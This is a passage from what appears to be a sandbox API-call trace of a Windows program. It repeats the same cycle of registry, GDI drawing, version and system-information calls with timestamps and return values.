TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.643] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.643] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb50401dc [0089.643] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb70401d9 [0089.643] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456b4 [0089.644] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456b5 [0089.644] CombineRgn (hrgnDst=0x10456b4, hrgnSrc1=0xb50401dc, hrgnSrc2=0xb70401d9, iMode=1) returned 1 [0089.644] CombineRgn (hrgnDst=0x10456b5, hrgnSrc1=0xb50401dc, hrgnSrc2=0xb70401d9, iMode=4) returned 2 [0089.644] CreateSolidBrush (color=0xff) returned 0x21056b3 [0089.644] CreateSolidBrush (color=0xff0000) returned 0x11056b6 [0089.644] DeleteObject (ho=0x11056b6) returned 1 [0089.644] DeleteObject (ho=0xb70401d9) returned 1 [0089.644] DeleteObject (ho=0xb50401dc) returned 1 [0089.644] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.644] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.644] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.644] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.644] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.644] BeginPath (hdc=0x0) returned 0 [0089.644] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.644] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.644] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.644] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.644] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.644] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.644] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.644] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.644] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb80401d9 [0089.644] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb60401dc [0089.644] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456b7 [0089.644] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456b8 [0089.644] CombineRgn (hrgnDst=0x10456b7, hrgnSrc1=0xb80401d9, hrgnSrc2=0xb60401dc, iMode=1) returned 1 [0089.644] CombineRgn (hrgnDst=0x10456b8, hrgnSrc1=0xb80401d9, hrgnSrc2=0xb60401dc, iMode=4) returned 2 [0089.644] CreateSolidBrush (color=0xff) returned 0x21056b6 [0089.645] CreateSolidBrush (color=0xff0000) returned 0x11056b9 [0089.645] DeleteObject (ho=0x11056b9) returned 1 [0089.645] DeleteObject (ho=0xb60401dc) returned 1 [0089.645] DeleteObject (ho=0xb80401d9) returned 1 [0089.645] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.645] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.645] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.645] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.645] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.645] BeginPath (hdc=0x0) returned 0 [0089.645] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.645] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.645] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.645] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.645] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.645] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.645] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.645] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.645] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb70401dc [0089.645] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb90401d9 [0089.645] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456ba [0089.645] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456bb [0089.645] CombineRgn (hrgnDst=0x10456ba, hrgnSrc1=0xb70401dc, hrgnSrc2=0xb90401d9, iMode=1) returned 1 [0089.645] CombineRgn (hrgnDst=0x10456bb, hrgnSrc1=0xb70401dc, hrgnSrc2=0xb90401d9, iMode=4) returned 2 [0089.645] CreateSolidBrush (color=0xff) returned 0x21056b9 [0089.645] CreateSolidBrush (color=0xff0000) returned 0x11056bc [0089.645] DeleteObject (ho=0x11056bc) returned 1 [0089.645] DeleteObject (ho=0xb90401d9) returned 1 [0089.645] DeleteObject (ho=0xb70401dc) returned 1 [0089.645] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.646] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.646] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.646] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.646] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.646] BeginPath (hdc=0x0) returned 0 [0089.646] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.646] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.646] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.646] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.646] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.646] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.646] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.646] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.646] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xba0401d9 [0089.646] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb80401dc [0089.646] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456bd [0089.646] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456be [0089.646] CombineRgn (hrgnDst=0x10456bd, hrgnSrc1=0xba0401d9, hrgnSrc2=0xb80401dc, iMode=1) returned 1 [0089.646] CombineRgn (hrgnDst=0x10456be, hrgnSrc1=0xba0401d9, hrgnSrc2=0xb80401dc, iMode=4) returned 2 [0089.646] CreateSolidBrush (color=0xff) returned 0x21056bc [0089.646] CreateSolidBrush (color=0xff0000) returned 0x11056bf [0089.646] DeleteObject (ho=0x11056bf) returned 1 [0089.646] DeleteObject (ho=0xb80401dc) returned 1 [0089.646] DeleteObject (ho=0xba0401d9) returned 1 [0089.646] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.646] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.646] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.646] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.646] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.647] BeginPath (hdc=0x0) returned 0 [0089.647] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.647] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.647] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.647] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.647] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.647] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.647] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.647] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.647] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb90401dc [0089.647] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbb0401d9 [0089.647] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456c0 [0089.647] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456c1 [0089.647] CombineRgn (hrgnDst=0x10456c0, hrgnSrc1=0xb90401dc, hrgnSrc2=0xbb0401d9, iMode=1) returned 1 [0089.647] CombineRgn (hrgnDst=0x10456c1, hrgnSrc1=0xb90401dc, hrgnSrc2=0xbb0401d9, iMode=4) returned 2 [0089.647] CreateSolidBrush (color=0xff) returned 0x21056bf [0089.647] CreateSolidBrush (color=0xff0000) returned 0x11056c2 [0089.647] DeleteObject (ho=0x11056c2) returned 1 [0089.647] DeleteObject (ho=0xbb0401d9) returned 1 [0089.647] DeleteObject (ho=0xb90401dc) returned 1 [0089.647] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.647] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.647] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.647] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.647] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.647] BeginPath (hdc=0x0) returned 0 [0089.647] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.647] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.647] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.647] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.647] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.647] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.647] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.647] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.648] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbc0401d9 [0089.648] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xba0401dc [0089.648] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456c3 [0089.648] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456c4 [0089.648] CombineRgn (hrgnDst=0x10456c3, hrgnSrc1=0xbc0401d9, hrgnSrc2=0xba0401dc, iMode=1) returned 1 [0089.648] CombineRgn (hrgnDst=0x10456c4, hrgnSrc1=0xbc0401d9, hrgnSrc2=0xba0401dc, iMode=4) returned 2 [0089.648] CreateSolidBrush (color=0xff) returned 0x21056c2 [0089.648] CreateSolidBrush (color=0xff0000) returned 0x11056c5 [0089.648] DeleteObject (ho=0x11056c5) returned 1 [0089.648] DeleteObject (ho=0xba0401dc) returned 1 [0089.648] DeleteObject (ho=0xbc0401d9) returned 1 [0089.648] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.648] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.648] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.648] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.648] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.648] BeginPath (hdc=0x0) returned 0 [0089.648] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.648] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.648] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.648] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.648] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.648] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.648] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.648] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.648] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbb0401dc [0089.648] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbd0401d9 [0089.648] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456c6 [0089.648] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456c7 [0089.648] CombineRgn (hrgnDst=0x10456c6, hrgnSrc1=0xbb0401dc, hrgnSrc2=0xbd0401d9, iMode=1) returned 1 [0089.648] CombineRgn (hrgnDst=0x10456c7, hrgnSrc1=0xbb0401dc, hrgnSrc2=0xbd0401d9, iMode=4) returned 2 [0089.648] CreateSolidBrush (color=0xff) returned 0x21056c5 [0089.648] CreateSolidBrush (color=0xff0000) returned 0x11056c8 [0089.648] DeleteObject (ho=0x11056c8) returned 1 [0089.648] DeleteObject (ho=0xbd0401d9) returned 1 [0089.648] DeleteObject (ho=0xbb0401dc) returned 1 [0089.648] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.648] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.649] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.649] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.649] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.649] BeginPath (hdc=0x0) returned 0 [0089.649] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.649] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.649] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.649] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.649] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.649] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.649] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.649] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.649] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbe0401d9 [0089.649] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbc0401dc [0089.649] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456c9 [0089.649] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456ca [0089.649] CombineRgn (hrgnDst=0x10456c9, hrgnSrc1=0xbe0401d9, hrgnSrc2=0xbc0401dc, iMode=1) returned 1 [0089.649] CombineRgn (hrgnDst=0x10456ca, hrgnSrc1=0xbe0401d9, hrgnSrc2=0xbc0401dc, iMode=4) returned 2 [0089.649] CreateSolidBrush (color=0xff) returned 0x21056c8 [0089.649] CreateSolidBrush (color=0xff0000) returned 0x11056cb [0089.649] DeleteObject (ho=0x11056cb) returned 1 [0089.649] DeleteObject (ho=0xbc0401dc) returned 1 [0089.649] DeleteObject (ho=0xbe0401d9) returned 1 [0089.649] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.649] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.649] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.649] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.649] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.649] BeginPath (hdc=0x0) returned 0 [0089.649] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.649] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.649] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.649] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.649] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.649] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.649] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.649] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.650] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbd0401dc [0089.650] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbf0401d9 [0089.650] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456cc [0089.650] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456cd [0089.650] CombineRgn (hrgnDst=0x10456cc, hrgnSrc1=0xbd0401dc, hrgnSrc2=0xbf0401d9, iMode=1) returned 1 [0089.650] CombineRgn (hrgnDst=0x10456cd, hrgnSrc1=0xbd0401dc, hrgnSrc2=0xbf0401d9, iMode=4) returned 2 [0089.650] CreateSolidBrush (color=0xff) returned 0x21056cb [0089.650] CreateSolidBrush (color=0xff0000) returned 0x11056ce [0089.650] DeleteObject (ho=0x11056ce) returned 1 [0089.650] DeleteObject (ho=0xbf0401d9) returned 1 [0089.650] DeleteObject (ho=0xbd0401dc) returned 1 [0089.650] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.650] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.650] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.650] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.650] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.650] BeginPath (hdc=0x0) returned 0 [0089.650] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.650] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.650] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.650] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.650] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.650] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.650] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.650] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.650] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc00401d9 [0089.650] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbe0401dc [0089.650] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456cf [0089.651] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456d0 [0089.651] CombineRgn (hrgnDst=0x10456cf, hrgnSrc1=0xc00401d9, hrgnSrc2=0xbe0401dc, iMode=1) returned 1 [0089.651] CombineRgn (hrgnDst=0x10456d0, hrgnSrc1=0xc00401d9, hrgnSrc2=0xbe0401dc, iMode=4) returned 2 [0089.651] CreateSolidBrush (color=0xff) returned 0x21056ce [0089.651] CreateSolidBrush (color=0xff0000) returned 